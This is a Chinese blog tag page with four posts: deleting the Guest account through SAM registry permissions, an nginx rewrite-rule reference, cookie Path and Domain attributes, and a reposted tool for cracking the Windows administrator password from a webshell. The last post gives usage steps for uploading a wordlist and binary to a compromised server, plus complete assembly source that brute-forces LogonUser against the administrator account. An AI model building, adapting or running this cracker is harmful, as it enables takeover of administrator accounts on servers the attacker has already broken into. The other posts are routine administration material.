无风的港湾 » domain

通过注册表彻底删除guest等账户

江小邪 — Wed, 28 Jul 2010 01:57:37 +0000

开始——运行regedt 启动注册表编辑器
找到HKEY_LOCAL_MACHINE窗口，选中SAM\SAM，然后点菜单中的权限设置，这时候我们可看到Administrators组只具有特殊权限，而SYSTEM账号却拥有全部控制权限，想一想这是为什么呢？其实很容易理解，SYSTEM账号是系统启动时候需要的账号，很多系统内核程序和服务程序大都是以该账号的权限运行的，若权限太低的话，恐怕我们的系统就运行不了！现在我们需要做的是更改Administrators权限（一定要在高级选项中记住该权限内容以备后用）为全部控制，这样我们就可以访问SAM下的信息了。
再次运行regedit：
此时HKEY_LOCAL_MACHINE\SAM\SAM下就有东西了，步步深入一直找到：
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 和 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
删除000001F5和Guest，然后退出regedit，再次运行regedt32，恢复Administrators对sam的权限（还记得Administrators的特殊权限吗？一定要记得啊，实在没有记住的话找其它同系统的机器看看也行，是一样的），这样是为了安全考虑，防止用户不小心删除系统账号。
进入dos窗口：
>net user
看看，会看大guest不见了，同样使用系统管理器的用户和组查看也是没有的了。这样就大功搞成了！
========
需要提醒的是：
1、不熟悉注册表编辑的一定不要乱来，否则可能导致系统崩溃。
2、删除前可考虑通过注册表的导出功能对删除的部分进行备份，以便恢复。深入去玩的方法是：
可通过编辑注册表的SAM信息可轻松删除或改动其它账
2、可编写程序以SYSTEM权限运行来访问注册表中的SAM信息实现删除guest。

Webshell下破解计算机管理员密码

江小邪 — Wed, 28 Jul 2010 01:30:06 +0000

软件作者：taiwansee
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

这个idea源自以前学runas命令时候的启发。

使用方法：
    1、把你的密码字典改名成psw.txt后，上传到目标服务器的一个可执行、可写的目录中。这里假设这个目录是：c:\windows\temp\
    2、把程序上传到c:\windows\temp\中，然后运行它。
    3、然后就是等待，过几分钟（具体时间看你的字典大小了）查阅c:\windows\temp\下的result_.txt中的结果，
       如果为空就说明还没破解完，另选时间再回来看。

特点：
    不需要抓hash，不需要管理员权限，ISUR_*用户就能用，速度慢（这个也是特点哦）在测试机中的表现是每秒尝试1800个密码左右。
    默认破解administrator用户的密码。要破其它，请自行修改代码。

result_.txt示例：
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
The administrator’s password is: tester
The program had tried 32653 times!
Use time:0 hour(s) 0 minute(s) 17.109 second(s),average speed: 1908 times/s.
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
源代码如下：
AdminPassCrack.asm文件
复制内容到剪贴板代码:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;                AdminPassCracker
;
;                                By taiwansee        2008.10.23
;
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff AdminPassCracker.asm
; Link /subsystem:windows AdminPassCracker.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                .386
                .model flat, stdcall
                option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include                windows.inc
include                user32.inc
includelib        user32.lib
include                kernel32.inc
includelib        kernel32.lib
include                Advapi32.inc
includelib        Advapi32.lib
include                _TotalTime.asm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                .const
DEBUG                                equ        0

LOGON32_LOGON_NETWORK equ 3
LOGON32_PROVIDER_DEFAULT equ 0

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
align 4
                .data?
hModuleHandle                DWORD        ?
szFileName                BYTE        MAX_PATH dup(?)

.data

szResultFile        BYTE        ’result_.txt’,0
szPswDic        BYTE        ’psw.txt’,0
szDomain        BYTE        ’.',0
szUserName        BYTE        ’administrator’,0

szResultFileFormat BYTE ’The administrator’,27h,’s password is: %s’,0dh,0ah
BYTE ’The program had tried %d times! ’,0dh,0ah,0

szNoDicFileErr                BYTE        ’Sorry,dic file not exists.’,0
szCreateFileMappingErr        BYTE        ’CreateFileMapping Error!’,0
szMapViewOfFileErr        BYTE        ’MapViewOfFile Error!’,0
szNotFound                BYTE        ’Password not found! ‘,0dh,0ah,0

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
align 4

_WinMain        proc
        local        @hPswDic:DWORD,\
                @szPswTmp[MAX_PATH]:BYTE,\
                @dwPswDicFileSize:DWORD,\
                @hResultFile:DWORD,\
                @dwWritten:DWORD,\
                @hPswDicFileMap:DWORD,\
                @hToken:DWORD,\
                @dwTriedTimes:DWORD,\
                @szBuf[MAX_PATH]:BYTE,\
                @dwContentLength:DWORD,\
                @lpPswDic:DWORD,\
                @lpNext:DWORD,\
                @lpStart:DWORD,\
                @dwStart:DWORD

;Create file to record results.
        invoke        CreateFile,offset szResultFile,GENERIC_READ or GENERIC_WRITE,\
                           FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,\
                           FILE_ATTRIBUTE_NORMAL,NULL
        .if        eax == INVALID_HANDLE_VALUE
                jmp _Error_Exit
        .endif
        mov        @hResultFile,eax
;Open Dictionary file.
        invoke        CreateFile,offset szPswDic,GENERIC_READ,\
                           FILE_SHARE_READ,NULL,OPEN_EXISTING,\
                           FILE_ATTRIBUTE_NORMAL,NULL
        .if        eax == INVALID_HANDLE_VALUE
                invoke        WriteFile,@hResultFile,offset szNoDicFileErr,sizeof szNoDicFileErr,addr @dwWritten,NULL
                jmp _Error_Exit
        .endif
        mov        @hPswDic,eax

        invoke        GetFileSize,@hPswDic,NULL
        mov        @dwPswDicFileSize,eax
;**********CreateFileMapping**********
        invoke        CreateFileMapping,@hPswDic,NULL,PAGE_READONLY,0,0,NULL
        .if        eax==NULL
                invoke        WriteFile,@hResultFile,offset szCreateFileMappingErr,\
                                  sizeof szCreateFileMappingErr,addr @dwWritten,NULL
                jmp _Error_Exit
        .endif
        mov        @hPswDicFileMap,eax
;**********MapViewOfFile**********
        invoke        MapViewOfFile,eax,FILE_MAP_READ,0,0,0
        .if        eax==NULL
                invoke        WriteFile,@hResultFile,offset szMapViewOfFileErr,\
                                  sizeof szMapViewOfFileErr,addr @dwWritten,NULL
                jmp _Error_Exit
        .endif
        mov        @lpPswDic,eax
        mov        @lpNext,eax
        mov        @lpStart,eax

        invoke        GetTickCount                ;计算使用的毫秒数,开始
        mov        @dwStart,eax

        xor        ecx,ecx        ;统计已经分析的字符个数
        xor        eax,eax
        mov        @dwTriedTimes,eax        ;统计尝试的次数

        .while        TRUE
                cld
                mov        esi,@lpStart
                lea        edi,@szPswTmp
        @@:
                lodsb
                .if        al!=0dh
                        stosb
                        inc        ecx
                        .if        ecx==@dwPswDicFileSize
                                jmp        @F
                        .elseif        ecx>@dwPswDicFileSize
                                jmp        _NotFound
                        .endif
                        jmp        @B
                .endif
        @@:
                add        ecx,2
                xor        eax,eax
                stosw                        ;用0结尾

                lea        eax,[esi+1]
                mov        @lpNext,eax        ;修正到下一个密码

                push        ecx        ;保存计数值
                invoke        LogonUser,offset szUserName,offset szDomain,addr @szPswTmp,\
                                  LOGON32_LOGON_NETWORK,\
                                  LOGON32_PROVIDER_DEFAULT,\
                                  addr @hToken
                .if        eax==NULL
                        pop        ecx        ;恢复计数值

                        push        @lpNext
                        pop        @lpStart

                        inc        @dwTriedTimes
                        .continue
                .else
                        pop        ecx        ;堆栈平衡
                        .break
                .endif
        .endw

        invoke        GetTickCount                ;计算使用的毫秒数,结束
        sub        eax,@dwStart
        mov        @dwStart,eax

        invoke        wsprintf,addr @szBuf,offset szResultFileFormat,addr @szPswTmp,@dwTriedTimes
        invoke        lstrlen,addr @szBuf
        mov        @dwContentLength,eax

        invoke        WriteFile,@hResultFile,addr @szBuf,\
                          @dwContentLength,addr @dwWritten,NULL

        invoke        _TotalTime,addr @szBuf,@dwStart,@dwTriedTimes,NULL
        invoke        lstrlen,addr @szBuf
        mov        @dwContentLength,eax

        invoke        WriteFile,@hResultFile,addr @szBuf,\
                          @dwContentLength,addr @dwWritten,NULL

        xor        eax,eax
        inc        eax
        ret

_NotFound:
        invoke        GetTickCount                ;计算使用的毫秒数,开始
        sub        eax,@dwStart
        mov        @dwStart,eax

        invoke        lstrcpy,addr @szBuf,offset szNotFound
        invoke        _TotalTime,addr @szPswTmp,@dwStart,@dwTriedTimes,NULL
        invoke        lstrcat,addr @szBuf,addr @szPswTmp

invoke lstrlen,addr @szBuf
mov @dwContentLength,eax

invoke WriteFile,@hResultFile,addr @szBuf,\
@dwContentLength,addr @dwWritten,NULL

_Error_Exit:
        xor        eax,eax
        ret
_WinMain        endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
        invoke        GetModuleHandle,NULL
        mov        hModuleHandle,eax
        invoke        GetModuleFileName,hModuleHandle,offset szFileName,sizeof szFileName
        invoke        lstrlen,offset szFileName
        cld
        mov        esi,offset szFileName
        add        esi,eax
        std
@@:
        lodsb
        cmp        al,5ch
        jne        @B
        mov        byte ptr [esi+2],0
        cld
        invoke        SetCurrentDirectory,offset szFileName
        call        _WinMain
        invoke        ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        end        start
_TotalTime.asm文件
复制内容到剪贴板代码:
                .data
szResultFormat        BYTE        ’Use time:%d hour(s) %d minute(s) %d.%03d second(s),average speed: %d times/s.’,0dh,0ah,0

                .code
;********************************************************
;        _TotalTime
;_lpBuf为调用者提供的接收结果缓冲区
;_dwTotalTime为总耗时，一般来说，前面有
;invoke        GetTickCount
;sub        eax,@dwStart
;这两条指令
;_dwThingsHappend为在计时期间，关心的事件发生的次数
;_FutrueExtention为将来拓展用
;********************************************************
_TotalTime        proc        _lpBuf,_dwTotalTime,_dwThingsHappend,_FutrueExtention

local        @dwStart:DWORD,\
        @dwMilliseconds:DWORD,\
        @dwSecond:DWORD,\
        @dwMinute:DWORD,\
        @dwHour:DWORD,\
        @dwSus:DWORD,\
        @AVGSpeed:DWORD

        mov        eax,_dwTotalTime
        ;时间换算
        xor        edx,edx
        mov        ebx,1000
        div        ebx
        mov        @dwMilliseconds,edx        ;毫秒

        xor        edx,edx
        mov        ebx,60
        div        ebx
        mov        @dwSecond,edx

        xor        edx,edx
        mov        ebx,60
        div        ebx
        mov        @dwMinute,edx

        xor        edx,edx
        mov        ebx,24
        div        ebx
        mov        @dwHour,edx

        ;计算平均速度:_dwThingsHappend÷_dwTotalTime
        xor        edx,edx

        mov        eax,_dwThingsHappend        ;_dwThingsHappend 也扩大1000倍(因为_dwTotalTime时间是毫秒数)
        mov        ebx,1000
        mul        ebx

        mov        ebx,_dwTotalTime        ;把_dwTotalTime的值恢复到ebx
        .if        ebx!=0
                div        ebx
                mov        @AVGSpeed,eax
        .else        ;如果_dwTotalTime为0,说明运行时间太少,无法统计,在这里用_dwThingsHappend作为@AVGSpeed的
                push        _dwThingsHappend
                pop        @AVGSpeed
        .endif

        invoke        wsprintf,_lpBuf,\
                         offset szResultFormat,\
                         @dwHour,\
                         @dwMinute,\
                         @dwSecond,\
                         @dwMilliseconds,\
                         @AVGSpeed

        xor        eax,eax
        inc        eax
        ret
_TotalTime        endp

nginx的rewrite规则

江小邪 — Sat, 22 May 2010 21:17:23 +0000

正则表达式匹配，其中：

* ~ 为区分大小写匹配
* ~* 为不区分大小写匹配
* !~和!~*分别为区分大小写不匹配及不区分大小写不匹配
文件及目录匹配，其中：

* -f和!-f用来判断是否存在文件
* -d和!-d用来判断是否存在目录
* -e和!-e用来判断是否存在文件或目录
* -x和!-x用来判断文件是否可执行
flag标记有：

* last 相当于Apache里的[L]标记，表示完成rewrite
* break 终止匹配, 不再匹配后面的规则
* redirect 返回302临时重定向地址栏会显示跳转后的地址
* permanent 返回301永久重定向地址栏会显示跳转后的地址
一些可用的全局变量有，可以用做条件判断(待补全)

$args
$content_length
$content_type
$document_root
$document_uri
$host
$http_user_agent
$http_cookie
$limit_rate
$request_body_file
$request_method
$remote_addr
$remote_port
$remote_user
$request_filename
$request_uri
$query_string
$scheme
$server_protocol
$server_addr
$server_name
$server_port
$uri
结合QeePHP的例子

if (!-d $request_filename) {
rewrite ^/([a-z-A-Z]+)/([a-z-A-Z]+)/?(.*)$ /index.php?namespace=user&controller=$1&action=$2&$3 last;
rewrite ^/([a-z-A-Z]+)/?$ /index.php?namespace=user&controller=$1 last;
break;
多目录转成参数
abc.domian.com/sort/2 => abc.domian.com/index.php?act=sort&name=abc&id=2
}

if ($host ~* (.*)\.domain\.com) {
set $sub_name $1;
rewrite ^/sort\/(\d+)\/?$ /index.php?act=sort&cid=$sub_name&id=$1 last;
}
目录对换
/123456/xxxx -> /xxxx?id=123456

rewrite ^/(\d+)/(.+)/ /$2?id=$1 last;
例如下面设定nginx在用户使用ie的使用重定向到/nginx-ie目录下：

if ($http_user_agent ~ MSIE) {
rewrite ^(.*)$ /nginx-ie/$1 break;
}
目录自动加“/”

if (-d $request_filename){
rewrite ^/(.*)([^/])$ http://$host/$1$2/ permanent;
}
禁止htaccess

location ~/\.ht {
deny all;
}
禁止多个目录

location ~ ^/(cron|templates)/ {
deny all;
break;
}
禁止以/data开头的文件
可以禁止/data/下多级目录下.log.txt等请求;

location ~ ^/data {
deny all;
}
禁止单个目录
不能禁止.log.txt能请求

location /searchword/cron/ {
deny all;
}
禁止单个文件

location ~ /data/sql/data.sql {
deny all;
}
给favicon.ico和robots.txt设置过期时间;
这里为favicon.ico为99天,robots.txt为7天并不记录404错误日志

location ~(favicon.ico) {
log_not_found off;
expires 99d;
break;
}

location ~(robots.txt) {
log_not_found off;
expires 7d;
break;
}
设定某个文件的过期时间;这里为600秒，并不记录访问日志

location ^~ /html/scripts/loadhead_1.js {
access_log off;
root /opt/lampp/htdocs/web;
expires 600;
break;
}
文件反盗链并设置过期时间
这里的return 412 为自定义的http状态码，默认为403，方便找出正确的盗链的请求
“rewrite ^/ http://leech.xxx.com/leech.gif;”显示一张防盗链图片
“access_log off;”不记录访问日志，减轻压力
“expires 3d”所有文件3天的浏览器缓存

location ~* ^.+\.(jpg|jpeg|gif|png|swf|rar|zip|css|js)$ {
valid_referers none blocked *.xxx.com *.xxx.net localhost 208.97.167.194;
if ($invalid_referer) {
rewrite ^/ http://leech.xxx.com/leech.gif;
return 412;
break;
}
access_log off;
root /opt/lampp/htdocs/web;
expires 3d;
break;
}
只充许固定ip访问网站，并加上密码

root /opt/htdocs/www;
allow 208.97.167.194;
allow 222.33.1.2;
allow 231.152.49.4;
deny all;
auth_basic “C1G_ADMIN”;
auth_basic_user_file htpasswd;
将多级目录下的文件转成一个文件，增强seo效果
/job-123-456-789.html 指向/job/123/456/789.html

rewrite ^/job-([0-9]+)-([0-9]+)-([0-9]+)\.html$ /job/$1/$2/jobshow_$3.html last;
将根目录下某个文件夹指向2级目录
如/shanghaijob/

指向 /area/shanghai/
如果你将last改成permanent，那么浏览器地址栏显是/location/shanghai/

rewrite ^/([0-9a-z]+)job/(.*)$ /area/$1/$2 last;
上面例子有个问题是访问/shanghai 时将不会匹配

rewrite ^/([0-9a-z]+)job$ /area/$1/ last;
rewrite ^/([0-9a-z]+)job/(.*)$ /area/$1/$2 last;
这样/shanghai 也可以访问了，但页面中的相对链接无法使用，
如./list_1.html真实地址是/area/shanghia/list_1.html会变成/list_1.html,导至无法访问。

那我加上自动跳转也是不行咯
(-d $request_filename)它有个条件是必需为真实目录，而我的rewrite不是的，所以没有效果

if (-d $request_filename){
rewrite ^/(.*)([^/])$ http://$host/$1$2/ permanent;
}
知道原因后就好办了，让我手动跳转吧

rewrite ^/([0-9a-z]+)job$ /$1job/ permanent;
rewrite ^/([0-9a-z]+)job/(.*)$ /area/$1/$2 last;
文件和目录不存在的时候重定向：

if (!-e $request_filename) {
proxy_pass http://127.0.0.1;
}
域名跳转

server
{
listen 80;
server_name jump.xxx.com;
index index.html index.htm index.php;
root /opt/lampp/htdocs/www;
rewrite ^/ http://www.xxx.com/;
access_log off;
}
多域名转向

server_name www.xxx.com;
index index.html index.htm index.php;
root /opt/lampp/htdocs;
if ($host ~ “xxx\.net”) {
rewrite ^(.*) http://www.xxx.com$1 permanent;
}
三级域名跳转

if ($http_host ~* “^(.*)\.i\.xxx\.com$”) {
rewrite ^(.*) http://top.xxx.com$1;
break;
}
域名镜向

server
{
listen 80;
server_name mirror.xxx.com;
index index.html index.htm index.php;
root /opt/lampp/htdocs/www;
rewrite ^/(.*) http://www.xxx.com/$1 last;
access_log off;
}
某个子目录作镜向

location ^~ /zhaopinhui {
rewrite ^.+ http://zph.xxx.com/ last;
break;
}
discuz ucenter home (uchome) rewrite

rewrite ^/(space|network)-(.+)\.html$ /$1.php?rewrite=$2 last;
rewrite ^/(space|network)\.html$ /$1.php last;
rewrite ^/([0-9]+)$ /space.php?uid=$1 last;
discuz 7 rewrite

rewrite ^(.*)/archiver/((fid|tid)-[\w\-]+\.html)$ $1/archiver/index.php?$2 last;
rewrite ^(.*)/forum-([0-9]+)-([0-9]+)\.html$ $1/forumdisplay.php?fid=$2&page=$3 last;
rewrite ^(.*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ $1/viewthread.php?tid=$2&extra=page\%3D$4&page=$3 last;
rewrite ^(.*)/profile-(username|uid)-(.+)\.html$ $1/viewpro.php?$2=$3 last;
rewrite ^(.*)/space-(username|uid)-(.+)\.html$ $1/space.php?$2=$3 last;
rewrite ^(.*)/tag-(.+)\.html$ $1/tag.php?name=$2 last;
给discuz某版块单独配置域名

server_name bbs.xxx.com;

location = / {
if ($http_host ~ news\.xxx.com$)
{
rewrite ^.+ http://news.xxx.com/forum-831-1.html last;
break;
}
}
discuz ucenter 头像 rewrite 优化

location ^~ /ucenter {
location ~ .*\.php?$
{
#fastcgi_pass unix:/tmp/php-cgi.sock;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
include fcgi.conf;
}

location /ucenter/data/avatar {
log_not_found off;
access_log off;
location ~ /(.*)_big\.jpg$ {
error_page 404 /ucenter/images/noavatar_big.gif;
}
location ~ /(.*)_middle\.jpg$ {
error_page 404 /ucenter/images/noavatar_middle.gif;
}
location ~ /(.*)_small\.jpg$ {
error_page 404 /ucenter/images/noavatar_small.gif;
}
expires 300;
break;
}
}
jspace rewrite

location ~ .*\.php?$
{
#fastcgi_pass unix:/tmp/php-cgi.sock;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
include fcgi.conf;
}

location ~* ^/index.php/
{
rewrite ^/index.php/(.*) /index.php?$1 break;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
include fcgi.conf;
}

关于Cookie中的Path和domain

江小邪 — Fri, 17 Aug 2007 02:39:04 +0000

Path – 路径。指定与cookie关联的WEB页。值可以是一个目录，或者是一个路径。如果http://www.5bay.cn/test/index.html 建立了一个cookie，那么在http://www.5bay.cn/test/目录里的所有页面，以及该目录下面任何子目录里的页面都可以访问这个cookie。这就是说，在http://www.5bay.cn/test/test2/test3 里的任何页面都可以访问http://www.5bay.cn/test/index.html建立的cookie。但是，如果http://www.5bay.cn/test/ 需要访问http://www.5bay.cn/test/index.html设置的cookes，该怎么办？这时，我们要把cookies的path属性设置成“/”。在指定路径的时候，凡是来自同一服务器，URL里有相同路径的所有WEB页面都可以共享cookies。

Domain – 域。指定关联的WEB服务器或域。值是域名，比如www.5bay.cn。这是对path路径属性的一个延伸。如果我们想让 www.5bay.cn能够访问bbs.5bay.cn设置的cookies，该怎么办? 我们可以把domain属性设置成“5bay.cn”，并把path属性设置成“/”。

Secure – 安全。指定cookie的值通过网络如何在用户和WEB服务器之间传递。这个属性的值或者是“secure”，或者为空。缺省情况下，该属性为空，也就是使用不安全的HTTP连接传递数据。如果一个 cookie 标记为secure，那么，它与WEB服务器之间就通过HTTPS或者其它安全协议传递数据。不过，设置了secure属性不代表其他人不能看到你机器本地保存的cookie。换句话说，把cookie设置为secure，只保证cookie与WEB服务器之间的数据传输过程加密，而保存在本地的 cookie文件并不加密。如果想让本地cookie也加密，得自己加密数据。

Expires – 过期时间。指cookie的生命期，确切地说是过期日期。如果想让cookie的存在期限超过当前浏览器的会话时间，就必须使用这个属性。当过了到期日期时，浏览器会自动删除cookie文件。

无风的港湾 » domain

通过注册表彻底删除guest等账户

相关博文

Webshell下破解计算机管理员密码

相关博文

nginx的rewrite规则

相关博文

关于Cookie中的Path和domain

相关博文